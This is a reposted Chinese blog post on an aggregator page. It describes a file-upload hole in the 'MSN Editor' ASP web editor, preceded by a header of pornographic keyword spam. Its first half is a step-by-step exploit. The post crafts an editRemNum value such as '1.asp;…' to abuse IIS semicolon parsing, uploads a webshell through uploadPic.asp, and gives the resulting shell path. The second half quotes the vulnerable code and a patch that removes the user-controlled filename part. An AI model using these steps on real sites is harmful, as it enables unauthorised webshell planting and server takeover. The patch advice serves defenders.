日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

MSN Editor 0DAY

發布時間:2024/4/14 编程问答 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 MSN Editor 0DAY 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

簡單說下利用的方法吧。
點擊圖片上傳后會出現上傳頁面,地址為

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=

用普通的圖片上傳后,地址為
http://www.xxx.cn/news/admin/uploadPic.asp?language=&editImageNum=1&editRemNum=41513102009204012

很明顯。圖片的地址是根據RemNum后面的編號生成的。

利用很簡單 配合IIS的解析漏洞,把RemNum后面的數據修改為1.asp;41513102009204012

變成下面這個地址

http://www.xxx.cn/admin/uploadPic.asp?language=&editImageNum=0&editRemNum=1.asp;41513102009204012

然后在瀏覽器里打開

然后選擇你的腳本***上傳

將會返回下面的地址
uppic/1.asp;41513102009204012_2.gif

然后直接打開就是我們的小馬地址!

[紅科網安]漏洞修補建議:

關鍵代碼:

???????????? if editRemNum<>"" then????????????????
??????????????? remNum = editRemNum
???????????? else
??????????????? Randomize
??????????????? remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
???????????? end if
???????????? remFileName = remNum&"_"&(editImageNum+1)&".gif"
????????? end if

?

去掉自定義部分,只留下隨機參數即可。

保留代碼:

??????????????? Randomize
??????????????? remNum = Int((999 - 1 + 1) * Rnd + 1)&day(date)&month(date)&year(date)&hour(time)&minute(time)&second(time)
???????????? end if
???????????? remFileName = remNum&"_"&(editImageNum+1)&".gif"

文章如轉載,請注明轉載自【網管小王的獨立博客】:http://www.5iadmin.com/

轉載于:https://blog.51cto.com/shanzhai/924615

總結

以上是生活随笔為你收集整理的MSN Editor 0DAY的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。